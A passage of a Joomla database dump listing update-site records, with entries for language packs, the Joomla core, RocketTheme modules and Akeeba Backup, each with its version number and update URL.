NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5674,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5675,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5676,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(5677,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(5678,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(5679,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(5680,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(5681,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(5682,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5683,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5684,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5685,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5686,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5687,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5688,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5689,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5690,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5691,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5692,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5693,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5694,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5695,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5696,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5697,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5698,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5699,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5700,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5701,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5702,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5703,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5704,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5705,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5706,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5707,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5708,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5709,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5710,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5711,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5712,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5713,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5714,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5715,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5716,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5717,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5718,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5719,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5720,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5721,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5722,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5723,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5724,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5725,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5726,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5727,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(5728,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(5729,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(5730,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5731,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5732,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5733,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5734,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5735,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5736,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5737,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5738,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5739,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5740,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5741,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5742,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5743,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5744,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5745,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5746,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5747,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5748,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5749,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5750,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5751,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5752,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5753,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5754,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5755,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5756,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5757,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5758,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5759,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5760,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5761,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5762,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5763,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5764,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5765,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5766,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5767,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5768,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5769,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5770,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5771,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5772,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5773,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5774,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5775,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5776,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5777,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5778,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5779,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5780,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5781,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5782,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5783,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5784,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5785,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5786,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(5787,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(5788,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(5789,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(5790,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(5791,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(5792,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5793,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5794,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5795,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5796,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5797,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5798,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5799,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5800,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5801,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5802,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5803,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5804,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5805,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5806,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5807,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5808,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5809,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5810,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5811,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5812,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5813,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5814,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5815,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5816,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5817,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5818,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5819,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5820,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5821,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5822,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5823,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5824,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5825,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5826,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5827,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5828,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5829,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5830,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5831,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5832,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5833,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5834,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5835,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5836,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5837,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(5838,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(5839,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(5840,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5841,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5842,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5843,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5844,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5845,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5846,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5847,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5848,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5849,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5850,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5851,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5852,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5853,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5854,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5855,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5856,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5857,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5858,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5859,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5860,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5861,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5862,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5863,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5864,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5865,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5866,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5867,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5868,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5869,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5870,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5871,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5872,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5873,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5874,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5875,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5876,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5877,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5878,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5879,3,0,'Chinese 